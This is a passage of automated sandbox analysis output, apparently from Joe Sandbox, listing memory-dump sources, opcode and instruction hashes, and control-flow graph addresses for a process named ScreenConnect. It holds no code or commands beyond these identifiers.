                                                                                    • Opcode Fuzzy Hash: b1efd09ad4698458dedcd9b665b1e4284e04d6930c1f295d84c8e981ff450e64
                                                                                    • Instruction Fuzzy Hash: 1DE1B2B5A0CA474BE799BF38C565EBA77D5EF98340F2401BDD04EC75C2DE28A8068340
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 29094b88ccb0cda400966a7fd125a584e367b782a0d01e0f9bd8aeac41a42247
                                                                                    • Instruction ID: b908e776ef59e6c86a36006822832558a8597d555e196da9193848629e9ca0e6
                                                                                    • Opcode Fuzzy Hash: 29094b88ccb0cda400966a7fd125a584e367b782a0d01e0f9bd8aeac41a42247
                                                                                    • Instruction Fuzzy Hash: 80E1C8B4A0CA474BE7A9BF38C565EB977D6EF88300F2441BDD04EC75C2DE29A8068241

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1280 7ffb4a8b3642-7ffb4a8d515a 1283 7ffb4a8d5164-7ffb4a8d5221 CreateNamedPipeW 1280->1283 1284 7ffb4a8d515c-7ffb4a8d5161 1280->1284 1286 7ffb4a8d5229-7ffb4a8d525c 1283->1286 1287 7ffb4a8d5223 1283->1287 1284->1283 1287->1286
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2815220924.00007FFB4A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A8B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4a8b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2489174969-0
                                                                                    • Opcode ID: db415ef3d4d909e623c4ecdb781d9fc40a87759caebc593782382e6ab5dd66d7
                                                                                    • Instruction ID: 429f3a3bb456d3f47b4fd554049383e275a207c8772ddf504a783f81628bc9c4
                                                                                    • Opcode Fuzzy Hash: db415ef3d4d909e623c4ecdb781d9fc40a87759caebc593782382e6ab5dd66d7
                                                                                    • Instruction Fuzzy Hash: 80518E7191CA1C8FDB68EF5CD845BA9BBE0FB59710F1442AEE44ED3241CB74A9818BC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6173464936091b3d9ea3519c2160166caea00b06a33a444c54ba37d4d7850962
                                                                                    • Instruction ID: f906697164dbc761c1f270d1bbe1601b6692c02f1619de0311dc250613404cef
                                                                                    • Opcode Fuzzy Hash: 6173464936091b3d9ea3519c2160166caea00b06a33a444c54ba37d4d7850962
                                                                                    • Instruction Fuzzy Hash: BB0272B161CA4A8FE798EF2CC469AB577D1FF98300F1444BED44EC7692DE28E8458741

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: h{J$p{J$x{J
                                                                                    • API String ID: 0-3980439061
                                                                                    • Opcode ID: ef17fbe26b723dcb88f19f5f54d600f615e5611faebffa72b020a12b45cba2b1
                                                                                    • Instruction ID: 68e85c92bf25d2b82f54368823662897ffbd10c66d5a3166a0f5e2a7ab510107
                                                                                    • Opcode Fuzzy Hash: ef17fbe26b723dcb88f19f5f54d600f615e5611faebffa72b020a12b45cba2b1
                                                                                    • Instruction Fuzzy Hash: 566195B6A0DA4A4FEB98EE28C855EA537D1FF54310B1401FDD48DDB586DE24EC46C780

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1724 7ffb4abc000a-7ffb4abc008e 1731 7ffb4abc00d8-7ffb4abc00dd 1724->1731 1732 7ffb4abc0090-7ffb4abc00d7 1724->1732 1734 7ffb4abc00de 1731->1734 1735 7ffb4abc00df-7ffb4abc0100 1731->1735 1732->1731 1734->1735 1739 7ffb4abc0124-7ffb4abc013c 1735->1739 1740 7ffb4abc0102-7ffb4abc0121 1735->1740 1745 7ffb4abc013e-7ffb4abc015d 1739->1745 1746 7ffb4abc0160-7ffb4abc017e 1739->1746 1740->1739 1745->1746 1749 7ffb4abc019a-7ffb4abc01a5 1746->1749 1750 7ffb4abc0180-7ffb4abc0198 1746->1750 1754 7ffb4abc023e-7ffb4abc0241 1749->1754 1755 7ffb4abc01ab-7ffb4abc01b4 1749->1755 1750->1749 1758 7ffb4abc0243-7ffb4abc024d 1754->1758 1759 7ffb4abc0298-7ffb4abc02a6 1754->1759 1756 7ffb4abc01b6-7ffb4abc01c3 1755->1756 1757 7ffb4abc01cd-7ffb4abc01d8 1755->1757 1756->1757 1765 7ffb4abc01c5-7ffb4abc01cb 1756->1765 1761 7ffb4abc0224-7ffb4abc0238 1757->1761 1762 7ffb4abc01da-7ffb4abc01f7 1757->1762 1766 7ffb4abc0255-7ffb4abc026e 1758->1766 1772 7ffb4abc02b0-7ffb4abc02b6 1759->1772 1761->1754 1768 7ffb4abc04bd-7ffb4abc04df 1761->1768 1769 7ffb4abc01fd-7ffb4abc0222 1762->1769 1770 7ffb4abc04e2-7ffb4abc053f 1762->1770 1765->1757 1778 7ffb4abc0270-7ffb4abc0272 1766->1778 1779 7ffb4abc02df-7ffb4abc02ea 1766->1779 1768->1770 1769->1761 1806 7ffb4abc054b-7ffb4abc0552 1770->1806 1807 7ffb4abc0541-7ffb4abc054a 1770->1807 1776 7ffb4abc02ba-7ffb4abc02c6 1772->1776 1777 7ffb4abc0400-7ffb4abc041e 1772->1777 1783 7ffb4abc02c8-7ffb4abc02ca 1776->1783 1784 7ffb4abc02cc-7ffb4abc02da 1776->1784 1777->1768 1808 7ffb4abc0424-7ffb4abc042e 1777->1808 1785 7ffb4abc0274 1778->1785 1786 7ffb4abc02ee-7ffb4abc02fa 1778->1786 1787 7ffb4abc02eb-7ffb4abc02ec 1779->1787 1792 7ffb4abc02dd-7ffb4abc02de 1783->1792 1784->1792 1785->1776 1793 7ffb4abc0276-7ffb4abc027a 1785->1793 1788 7ffb4abc02fc-7ffb4abc02fe 1786->1788 1789 7ffb4abc0300-7ffb4abc0301 1786->1789 1787->1786 1795 7ffb4abc0311-7ffb4abc0315 1788->1795 1796 7ffb4abc0302-7ffb4abc030e 1789->1796 1792->1779 1793->1787 1798 7ffb4abc027c-7ffb4abc0281 1793->1798 1799 7ffb4abc0316-7ffb4abc032e 1795->1799 1796->1795 1798->1796 1802 7ffb4abc0283-7ffb4abc028e 1798->1802 1815 7ffb4abc0334-7ffb4abc0342 1799->1815 1816 7ffb4abc0330-7ffb4abc0332 1799->1816 1803 7ffb4abc0290-7ffb4abc0295 1802->1803 1804 7ffb4abc02ff 1802->1804 1803->1799 1809 7ffb4abc0297 1803->1809 1804->1789 1811 7ffb4abc0554-7ffb4abc055d 1806->1811 1812 7ffb4abc055e-7ffb4abc0569 1806->1812 1813 7ffb4abc0434-7ffb4abc0442 1808->1813 1814 7ffb4abc0430-7ffb4abc0432 1808->1814 1809->1759 1817 7ffb4abc0445-7ffb4abc0462 1813->1817 1814->1817 1819 7ffb4abc0345-7ffb4abc0362 1815->1819 1816->1819 1824 7ffb4abc0464-7ffb4abc0466 1817->1824 1825 7ffb4abc0468-7ffb4abc0476 1817->1825 1826 7ffb4abc0364-7ffb4abc0366 1819->1826 1827 7ffb4abc0368-7ffb4abc0376 1819->1827 1828 7ffb4abc0479-7ffb4abc0496 1824->1828 1825->1828 1829 7ffb4abc0379-7ffb4abc038f 1826->1829 1827->1829 1834 7ffb4abc0498-7ffb4abc049a 1828->1834 1835 7ffb4abc049c-7ffb4abc04aa 1828->1835 1836 7ffb4abc03a6-7ffb4abc03ad 1829->1836 1837 7ffb4abc0391-7ffb4abc03a4 1829->1837 1838 7ffb4abc04ad-7ffb4abc04b6 1834->1838 1835->1838 1841 7ffb4abc03b4-7ffb4abc03c7 1836->1841 1837->1836 1842 7ffb4abc03cd-7ffb4abc03d0 1837->1842 1838->1768 1841->1842 1843 7ffb4abc03e7-7ffb4abc03fa 1842->1843 1844 7ffb4abc03d2-7ffb4abc03e5 1842->1844 1843->1777 1844->1777 1844->1843
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b52b42e6aa8ad52716cf1148b3b59560f700a5901eac62b6ad464df41babf991
                                                                                    • Instruction ID: 62e15aae28c8aeb452d35ccf744bfa70ae60984bfb994cf8df5beae5818503a5
                                                                                    • Opcode Fuzzy Hash: b52b42e6aa8ad52716cf1148b3b59560f700a5901eac62b6ad464df41babf991
                                                                                    • Instruction Fuzzy Hash: 0712E2A5A0DE4A4FF799EE3CD595AB53BD5EF59300F2400FEE489CB683DD28A8458340
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b3815ff7b96fac0b3cb731433fed656629d9c10953087b932f781462fd71b45
                                                                                    • Instruction ID: ac6a1c372f66e52e9dbbdb0ff6445778cd4822cb8ae10b290ee5e3484235332f
                                                                                    • Opcode Fuzzy Hash: 8b3815ff7b96fac0b3cb731433fed656629d9c10953087b932f781462fd71b45
                                                                                    • Instruction Fuzzy Hash: 01C13AA690CA0B1BEB59FE38D846DF577D1EF54310B2402BED44EC7986DD29F94A8380
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 460d99353cbc5e8aee4ae6e2b20a7779fd371b0fcb6904d418dab2d0a3edac34
                                                                                    • Instruction ID: e6054cf7f37a8cfcfd6fc10c17b1249a5298aed67a310dd56726380e4a37038f
                                                                                    • Opcode Fuzzy Hash: 460d99353cbc5e8aee4ae6e2b20a7779fd371b0fcb6904d418dab2d0a3edac34
                                                                                    • Instruction Fuzzy Hash: 46B1E57960DA468FDB89FF3CD1A16E577A1FF5831472405FAC099CB587CA24E886C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bc1cc19e62a5f708512d8da1725c51b0e45f7a90997edcce32beb3088799c92
                                                                                    • Instruction ID: df8f5b18563b939e7fd71640f6bf3d1358f002ef388e77d793ee5093e78f586e
                                                                                    • Opcode Fuzzy Hash: 0bc1cc19e62a5f708512d8da1725c51b0e45f7a90997edcce32beb3088799c92
                                                                                    • Instruction Fuzzy Hash: 71B1E36AA0D6864FD78AFF3CD1A16E47BA0FF5531872805FAC098CB587CD14E88A8750
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b8422f69c43a1b4c1cb005a293105f162e28049911022677ccc6baaa3a5fdcb
                                                                                    • Instruction ID: e634bf19e4348de73ff0c435f69459be0caf8e29be60940490674ad2c39b686c
                                                                                    • Opcode Fuzzy Hash: 2b8422f69c43a1b4c1cb005a293105f162e28049911022677ccc6baaa3a5fdcb
                                                                                    • Instruction Fuzzy Hash: A94127A6A0DA8B5BE749FF7CD8559F97B91EF59300F2400FED489C3583DD29A8858380
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ebb82559055fd1dd48fd5c7ec8dedede7649da8b445938330d7288919f802fcd
                                                                                    • Instruction ID: c1c634e5389309d13f3b8b8a3fa0ab38b010b0645a10e9bd45993c0eddaae243
                                                                                    • Opcode Fuzzy Hash: ebb82559055fd1dd48fd5c7ec8dedede7649da8b445938330d7288919f802fcd
                                                                                    • Instruction Fuzzy Hash: 874125B6A0DA4A8BF755FEB8E8518E97B91FFD4304B1401BDE1CDC3592DE24A806C384
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c7e0c04b2ce829057c3c23ab3bf39db3507bd36cd997a5b351619db77d52d55
                                                                                    • Instruction ID: 4ef7995fef3ccba88192d9c6b3a023df14a8dfcda05c1fb1d1c2d88f2e23ae6f
                                                                                    • Opcode Fuzzy Hash: 7c7e0c04b2ce829057c3c23ab3bf39db3507bd36cd997a5b351619db77d52d55
                                                                                    • Instruction Fuzzy Hash: 3D414FAB90E2925FE312BF7CF5A54E57F64FF4221871800FBD1C98B593EC0858498791
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59da8985d90c995d817ee43dca7634ac8e63f7a0130fa5e517406ab47eb3565
                                                                                    • Instruction ID: 1125bb930dccfbca49bc295db61fe709a7e959ab36664269127e6a82545c8735
                                                                                    • Opcode Fuzzy Hash: a59da8985d90c995d817ee43dca7634ac8e63f7a0130fa5e517406ab47eb3565
                                                                                    • Instruction Fuzzy Hash: 0421E45690EBC51FF396AFB89D618A07FA4EF5721071901FFD088CB493C80C5C4A8361
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 299c6d7a1dabefa6b6c9529118a680a731cb59bf1f5b9905ab792911c37fb082
                                                                                    • Instruction ID: 5371e832d18fe9763cebcc21829e9feff71e0e52629ad74465f181a50e78b8e7
                                                                                    • Opcode Fuzzy Hash: 299c6d7a1dabefa6b6c9529118a680a731cb59bf1f5b9905ab792911c37fb082
                                                                                    • Instruction Fuzzy Hash: AE21B17AA0E2568AD702FF7CF5A14EA7B60EF4622C71801F7D1C98B563ED14188A8791
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 220358c5b657d7ec52fab0ed935725f2060710ad6aeca7a8b8e9ad0b6ff2e276
                                                                                    • Instruction ID: 48ff6f36503e72dd1a61802bc8a02e0941ad721609f2593b9960cff6784dc0e3
                                                                                    • Opcode Fuzzy Hash: 220358c5b657d7ec52fab0ed935725f2060710ad6aeca7a8b8e9ad0b6ff2e276
                                                                                    • Instruction Fuzzy Hash: 5C219A2114E2D95FC307AB78D8659DA7FB4EF8721470901E7E089CB0A3C91C995AC7A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 282f29203cd00d7d6872d1960f56ce6a1b765646ac43cab4f6c54f9125397e80
                                                                                    • Instruction ID: ae32510932e89648a645132e7d4a0a4f729aaa5695b78d61654e9d67e3565f42
                                                                                    • Opcode Fuzzy Hash: 282f29203cd00d7d6872d1960f56ce6a1b765646ac43cab4f6c54f9125397e80
                                                                                    • Instruction Fuzzy Hash: 3D1198B7B0DD494AFB99AFF8AE215F93A95EF44314F1400FEE08DC3992DE149901C285
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c08c544d2b4df926e567c0e8d425c511e038ef0e27e9f231c845f6e234d78a5d
                                                                                    • Instruction ID: e796d24f5c443bbec157684056fe1c89d750138be4996444d23aeabbf767013a
                                                                                    • Opcode Fuzzy Hash: c08c544d2b4df926e567c0e8d425c511e038ef0e27e9f231c845f6e234d78a5d
                                                                                    • Instruction Fuzzy Hash: 631127B2D1E98A5FE346EF78C8199F9BFA1EF85200B5441FAD449C7192DD2896458380
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8210421a35892550d75431ea4bfe668b3785bee47f4ed65760f1376965a36b85
                                                                                    • Instruction ID: 2ce26d4e9f142c282b3a58c013c2b39665a39bb3647285f0f03da3de80862b13
                                                                                    • Opcode Fuzzy Hash: 8210421a35892550d75431ea4bfe668b3785bee47f4ed65760f1376965a36b85
                                                                                    • Instruction Fuzzy Hash: 7411D2B6E0CA494BEB91EF788C655E87FE0FF99304F1441EDD088D7192DA249805C745
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3bf9ef6156c9c8d035f7e12dbcb93388ddf158aad6bda1c443fc72ba379e4ded
                                                                                    • Instruction ID: 6e87e188b09f0e81e3e2d82a18850757bd97a4064ab37bdf452c1d9a567ce8ec
                                                                                    • Opcode Fuzzy Hash: 3bf9ef6156c9c8d035f7e12dbcb93388ddf158aad6bda1c443fc72ba379e4ded
                                                                                    • Instruction Fuzzy Hash: 40114FA5A0CA464FDB88FF28C555A657BA1FF58310B1441FCD44DDF286CE39E8458780
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eb5ebf8e6adba5823c63e67bb43faaacf0d7103ff4920daa326a42fb148f3e52
                                                                                    • Instruction ID: fe0b9b3583d736cb4ba2c3a1f4483d873798d74e9c823cca337115d0f5364a00
                                                                                    • Opcode Fuzzy Hash: eb5ebf8e6adba5823c63e67bb43faaacf0d7103ff4920daa326a42fb148f3e52
                                                                                    • Instruction Fuzzy Hash: 53112EA5A09A4A4FDB88FF28C455BA57BE1FF98310B1441ECD44DDF287DE39E8458780
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 36efc8ffa6f31faa2e9ca50d9164671e1355d37cdfb2594ea47b7f9e60855320
                                                                                    • Instruction ID: 729c6246bb0e3014ff554a40b246e65375f89bb7af5c6a57e86715deef772d00
                                                                                    • Opcode Fuzzy Hash: 36efc8ffa6f31faa2e9ca50d9164671e1355d37cdfb2594ea47b7f9e60855320
                                                                                    • Instruction Fuzzy Hash: 1611C15990DA530AF769AA3885687752AE1DF45201F2940FBC449C65DBDC5C9D818341
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6411b67bc0aba07b100de685f9d01f913cd09b9e4e8e867edf884d42f4f49aa1
                                                                                    • Instruction ID: d45f70f17661839398b0e4dc84b7ac94ce3cf64de1689275d54862a4357c1aab
                                                                                    • Opcode Fuzzy Hash: 6411b67bc0aba07b100de685f9d01f913cd09b9e4e8e867edf884d42f4f49aa1
                                                                                    • Instruction Fuzzy Hash: CF01222260EBC80FD3C6DF6CACA95A17FE4EF5B22130800EBE488CB263D8009C45C341
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 995d105f1e3af62aeb89f31e0c714d6f4a7bf65dac76cdae8b86da430fdc175e
                                                                                    • Instruction ID: d3beb3c51e77576d8ad4b859ebedde8939c786b7adde5ca9adc28cb8005e08eb
                                                                                    • Opcode Fuzzy Hash: 995d105f1e3af62aeb89f31e0c714d6f4a7bf65dac76cdae8b86da430fdc175e
                                                                                    • Instruction Fuzzy Hash: 71F09B3540C68C5FCF46EF74D0608D57F70EF56311B1501C7E149CB052D7218A59CB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 909f8321c2ada6b1a3c4cf78d9822b1f499651a699ac84abd4f0b9415fcb276d
                                                                                    • Instruction ID: 1a6b4c6eff4f987b300db59ea158d60f9c3704ffef17f6c1f52c009fc8bf1adf
                                                                                    • Opcode Fuzzy Hash: 909f8321c2ada6b1a3c4cf78d9822b1f499651a699ac84abd4f0b9415fcb276d
                                                                                    • Instruction Fuzzy Hash: BCE0DF6010F3D44FCB47AB3884A88E07F60DE2722034941EFE581CF1B3E5188A89C742
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7131152fa9d647beb4eb4aa5c66964ddad608b956e94367e5054255e31db9216
                                                                                    • Instruction ID: df459fe03a2052c61e2ea04bd1aac40ad99b137bd54d93d1e3a504def5c8c4ba
                                                                                    • Opcode Fuzzy Hash: 7131152fa9d647beb4eb4aa5c66964ddad608b956e94367e5054255e31db9216
                                                                                    • Instruction Fuzzy Hash: 18E08CA994D61306FB6C3D75A6957B960D98F04310F2940FEE40DC08CECC9C9D808191
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ecd9219a89bf8732386d0cd3326b88882577acd34833cd4252d910058fa4e93e
                                                                                    • Instruction ID: ce0c3f0538b4c6340c0ceaa3fc36c63f594d8d621c435fa6634e8b34744ff3f7
                                                                                    • Opcode Fuzzy Hash: ecd9219a89bf8732386d0cd3326b88882577acd34833cd4252d910058fa4e93e
                                                                                    • Instruction Fuzzy Hash: 85C08C02B1C82E0A50A4B62C78012B941C2D79822078400F2EC0CC224ADC084CC203C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 07f573711ca0563017fef6dcb8503b746daed36e624ff9afe51ce6372677206e
                                                                                    • Instruction ID: 00ad32508b8581eca1a88c684b455bd7a084bc0efbf425151f3fcf72169c1edc
                                                                                    • Opcode Fuzzy Hash: 07f573711ca0563017fef6dcb8503b746daed36e624ff9afe51ce6372677206e
                                                                                    • Instruction Fuzzy Hash: 5AC09B94E1C5464BF545FF34C54157E165ABFCC600F7044B5F00E851D6CD3CA5015545
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
